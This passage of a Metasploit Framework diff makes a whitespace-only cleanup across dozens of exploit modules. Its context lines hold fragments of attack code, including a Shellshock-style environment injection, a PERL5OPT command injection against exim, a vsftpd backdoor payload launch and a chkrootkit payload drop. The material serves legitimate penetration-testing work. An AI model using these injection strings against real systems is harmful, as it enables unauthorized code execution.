b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 2108850b5a..d90200ae29 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -300,5 +300,4 @@ class MetasploitModule < Msf::Exploit::Remote def service_details super.merge({ access_level: 'Admin' }) end - end diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index b01dfe4fc8..94b1065ab9 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -407,5 +407,4 @@ class MetasploitModule < Msf::Exploit::Remote def service_details super.merge({ access_level: 'Admin' }) end - end diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb index f3ac343c6b..909f998344 100644 --- a/modules/exploits/multi/http/vbseo_proc_deutf.rb +++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Server replied with #{response ? response.code : "nothing"}") end - end diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index 87371d346a..2a92e2bb51 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -178,5 +178,4 @@ class MetasploitModule < Msf::Exploit::Remote return res end - end diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb index 6348c26223..aec0f35810 100644 --- a/modules/exploits/multi/http/werkzeug_debug_rce.rb +++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote print_error('Secret code not detected.') end end - end diff --git a/modules/exploits/multi/http/zenworks_control_center_upload.rb b/modules/exploits/multi/http/zenworks_control_center_upload.rb index 97e34dce78..cd11417178 100644 --- a/modules/exploits/multi/http/zenworks_control_center_upload.rb +++ b/modules/exploits/multi/http/zenworks_control_center_upload.rb @@ -121,5 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', }) end - end diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb index a8ff2fecec..0c80d89b2f 100644 --- a/modules/exploits/multi/misc/arkeia_agent_exec.rb +++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb @@ -557,5 +557,4 @@ class MetasploitModule < Msf::Exploit::Remote def autofilter true end - end diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index dd1abd5d6b..51133afbed 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -172,5 +172,4 @@ set returnValue to "/tmp/#{payload_name}" end end - end diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index 37de47d066..f83f5842e7 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -329,5 +329,4 @@ class MetasploitModule < Msf::Exploit::Remote true end - end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index b2ac5d5ea7..a00ec03679 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -287,5 +287,4 @@ class MetasploitModule < Msf::Exploit::Remote arguments end - end diff --git a/modules/exploits/multi/misc/legend_bot_exec.rb b/modules/exploits/multi/misc/legend_bot_exec.rb index 93bc165338..2433a4222c 100644 --- a/modules/exploits/multi/misc/legend_bot_exec.rb +++ b/modules/exploits/multi/misc/legend_bot_exec.rb @@ -162,5 +162,4 @@ class MetasploitModule < Msf::Exploit::Remote quit(sock) disconnect end - end diff --git a/modules/exploits/multi/misc/openoffice_document_macro.rb b/modules/exploits/multi/misc/openoffice_document_macro.rb index 2f07873f5a..ce72f2088a 100644 --- a/modules/exploits/multi/misc/openoffice_document_macro.rb +++ b/modules/exploits/multi/misc/openoffice_document_macro.rb @@ -209,5 +209,4 @@ class MetasploitModule < Msf::Exploit::Remote def exploit super end - end diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index faa634e3f6..69ced237b5 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/multi/misc/w3tw0rk_exec.rb b/modules/exploits/multi/misc/w3tw0rk_exec.rb index ee32ca3565..d30e2d175b 100644 --- a/modules/exploits/multi/misc/w3tw0rk_exec.rb +++ b/modules/exploits/multi/misc/w3tw0rk_exec.rb @@ -152,5 +152,4 @@ class MetasploitModule < Msf::Exploit::Remote quit(sock) disconnect end - end diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index 30b4b3ef53..bb7703967f 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -215,5 +215,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 53f53dd84b..e1b30be18c 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -235,5 +235,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/multi/misc/xdh_x_exec.rb b/modules/exploits/multi/misc/xdh_x_exec.rb index 7dc17e068d..b0b314d56e 100644 --- a/modules/exploits/multi/misc/xdh_x_exec.rb +++ b/modules/exploits/multi/misc/xdh_x_exec.rb @@ -164,5 +164,4 @@ class MetasploitModule < Msf::Exploit::Remote quit(sock) disconnect end - end diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 3f711b6737..e846e9777f 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index 7b65e28bc3..d6745476c2 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -426,5 +426,4 @@ class MetasploitModule < Msf::Exploit::Remote def encode_semis(str) str.gsub(';') { |s| sprintf("%%%.2x", s[0]) } end - end diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index 1444f8fc82..c49452e471 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index fa056f69ea..391e6461a9 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -149,5 +149,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index dd7d183f02..68f6c457b1 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index cffe21caab..d01e1c0b74 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -118,5 +118,4 @@ class MetasploitModule < Msf::Exploit::Remote def lengther(buf) "#{buf.length}:" + buf end - end diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index bdbc18481f..a42c6a75e7 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -180,6 +180,5 @@ class MetasploitModule < Msf::Exploit::Remote def execute_command(cmd, opts = {}) exec_command(cmd) end - end diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 5dda80e8de..81c2745d77 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index 74880fc2ed..ab40d7549f 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index 16c8e632b7..6efecc5504 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 66e495e866..cd8073d58b 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -105,5 +105,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index fdd95e754d..547d02ac0e 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -152,5 +152,4 @@ class MetasploitModule < Msf::Exploit::Remote # handle the payload handler(cli) end - end diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index 9561a4b0b7..c8da0ee97c 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -320,7 +320,6 @@ class MetasploitModule < Msf::Exploit::Remote cli.send_response(res) end - end =begin diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index eb3713427a..5aab92ba24 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -205,5 +205,4 @@ class MetasploitModule < Msf::Exploit::Remote "\x00\x00\x00\x1c\x00\x32\x00\x00\x75\x73\x72\x6f\x00\x00\x00\x0a"+ "\x00\x00\xff\xff\x00\x00\x00\x00\x01\x0d\x21\x7c" end - end diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index c61c8096c5..547fd879f8 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -143,5 +143,4 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, body, header) handler(cli) end - end diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index b4020ccce2..8cd400d16f 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -148,5 +148,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Waiting for a payload session (backgrounding)...") end - end diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index ff1a2ed9e5..0b396fcd92 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index e45efc2d82..e7b8b84684 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote handler() disconnect end - end diff --git a/modules/exploits/osx/local/dyld_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb index 0af57afd87..d414846043 100644 --- a/modules/exploits/osx/local/dyld_print_to_file_root.rb +++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Local @payload_file ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}" end - end diff --git a/modules/exploits/osx/local/iokit_keyboard_root.rb b/modules/exploits/osx/local/iokit_keyboard_root.rb index 06d2e81681..0f085a0703 100644 --- a/modules/exploits/osx/local/iokit_keyboard_root.rb +++ b/modules/exploits/osx/local/iokit_keyboard_root.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Local def ver_lt(a, b) Gem::Version.new(a) < Gem::Version.new(b) end - end diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index 47c2f2878a..2366ac0bf0 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Local def ver_lt(a, b) Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,'')) end - end diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb index fcd973af33..0e94bc9946 100644 --- a/modules/exploits/osx/local/rootpipe.rb +++ b/modules/exploits/osx/local/rootpipe.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Local @payload_file ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}" end - end diff --git a/modules/exploits/osx/local/rootpipe_entitlements.rb b/modules/exploits/osx/local/rootpipe_entitlements.rb index 9cfe6a0cbf..0fc4b76dbc 100644 --- a/modules/exploits/osx/local/rootpipe_entitlements.rb +++ b/modules/exploits/osx/local/rootpipe_entitlements.rb @@ -154,5 +154,4 @@ class MetasploitModule < Msf::Exploit::Local @root_file ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}" end - end diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index 4ebe82d30e..165f2fefd3 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -257,5 +257,4 @@ class MetasploitModule < Msf::Exploit::Local end end end - end diff --git a/modules/exploits/osx/local/tpwn.rb b/modules/exploits/osx/local/tpwn.rb index 86cfaed518..d9a0712236 100644 --- a/modules/exploits/osx/local/tpwn.rb +++ b/modules/exploits/osx/local/tpwn.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Exploit::Local @payload_file ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}" end - end diff --git a/modules/exploits/osx/local/vmware_bash_function_root.rb b/modules/exploits/osx/local/vmware_bash_function_root.rb index 0ca9a60a17..b122ea4b90 100644 --- a/modules/exploits/osx/local/vmware_bash_function_root.rb +++ b/modules/exploits/osx/local/vmware_bash_function_root.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Local print_status("Running VMWare services...") cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random") end - end diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index 0098eb1757..1172d466c1 100644 --- a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote client.put(buffer) end - end diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index bcf1274d4d..0a771e1344 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -333,5 +333,4 @@ class MetasploitModule < Msf::Exploit::Remote dcerpc.last_response.stub_data[0,20] end - end diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index b9a90f8216..09112a3e97 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -102,5 +102,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index bcf9a0fa42..509af21649 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -147,5 +147,4 @@ class MetasploitModule < Msf::Exploit::Remote connect @spc_seq = 0 end - end diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index 74b1602f15..2c215a3889 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -161,5 +161,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length)) return true end - end diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 97b25fcd9d..31c1fff6ca 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -156,5 +156,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 5dc5a137c4..ba2989672c 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Exploit::Remote def do_int(str, int) Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0) end - end diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index d8181c4bc3..1df53a2da9 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote rescue ::Rex::Proto::SunRPC::RPCTimeout print_warning('Warning: ' + $!) end - end diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 25fe749fc6..374bf1e6ff 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index b13629e112..f1dedc9c67 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb index ad7da8e1fc..8cc5f767a4 100644 --- a/modules/exploits/unix/dhcp/bash_environment.rb +++ b/modules/exploits/unix/dhcp/bash_environment.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Exploit::Remote stop_service end end - end diff --git a/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb b/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb index 2585f08da2..637cca7bbd 100644 --- a/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb +++ b/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit target[:template] )) end - end diff --git a/modules/exploits/unix/fileformat/imagemagick_delegate.rb b/modules/exploits/unix/fileformat/imagemagick_delegate.rb index 0ca43adf69..8dfac28aca 100644 --- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb +++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Exploit fail_with(Failure::NoTarget, "Target has no #{t} support") end end - end diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index cf490c8b5c..d29fb8371c 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index 5e38373a50..65d5ff8323 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -141,5 +141,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload") end end - end diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 6cc6bc91ce..035a013b7d 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote s.put("nohup " + payload.encoded + " >/dev/null 2>&1") handler(s) end - end diff --git a/modules/exploits/unix/http/ctek_skyrouter.rb b/modules/exploits/unix/http/ctek_skyrouter.rb index 695d9ff127..44a79dcd5e 100644 --- a/modules/exploits/unix/http/ctek_skyrouter.rb +++ b/modules/exploits/unix/http/ctek_skyrouter.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb index e09a280ec2..892d2988e2 100644 --- a/modules/exploits/unix/http/freepbx_callmenum.rb +++ b/modules/exploits/unix/http/freepbx_callmenum.rb @@ -78,6 +78,5 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end end - end diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 92960402d1..1e86125b86 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -104,5 +104,4 @@ class MetasploitModule < Msf::Exploit::Remote 'headers' => headers }, 10) end - end diff --git a/modules/exploits/unix/http/twiki_debug_plugins.rb b/modules/exploits/unix/http/twiki_debug_plugins.rb index 3efc2b65a7..f96125398b 100644 --- a/modules/exploits/unix/http/twiki_debug_plugins.rb +++ b/modules/exploits/unix/http/twiki_debug_plugins.rb @@ -95,5 +95,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/local/chkrootkit.rb b/modules/exploits/unix/local/chkrootkit.rb index bf1f1be6a3..96520a4ada 100644 --- a/modules/exploits/unix/local/chkrootkit.rb +++ b/modules/exploits/unix/local/chkrootkit.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Local print_status('Payload written to /tmp/update') print_status('Waiting for chkrootkit to run via cron...') end - end diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb index 2d87727758..a389bb7781 100644 --- a/modules/exploits/unix/local/exim_perl_startup.rb +++ b/modules/exploits/unix/local/exim_perl_startup.rb @@ -50,5 +50,4 @@ class MetasploitModule < Msf::Exploit::Local # PERL5DB technique from http://perldoc.perl.org/perlrun.html cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-}) end - end diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index 3969ab9103..4a5d8e5fbd 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -139,5 +139,4 @@ class MetasploitModule < Msf::Exploit::Remote return res end - end diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 91506cc549..6b4ed5caaf 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index c1ba7666d0..fa6f8df215 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -88,5 +88,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("The zabbix agent should have executed our command.") disconnect end - end diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index 8221fefaad..f7517b721c 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index fbf3b20912..e3f7c510de 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -345,5 +345,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 0be76d0106..de218b2cbb 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -188,5 +188,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!") Net::SSH::CommandStream.new(ssh, build_command, true) end - end diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 9e12f2f1f7..459c2eb46a 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -127,5 +127,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index a0d731a996..2ba957de09 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No response from the server") end end - end diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 72eeca7537..44e70dddac 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No response from the server") end end - end diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index d86b240dfd..f6c793a858 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No response from the server") end end - end diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index b3d7c78b25..f1d41bdb2b 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No response from the server") end end - end diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index c20b11d31f..4898d9bf12 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index abcc40ec4c..ab40d24b35 100644 --- 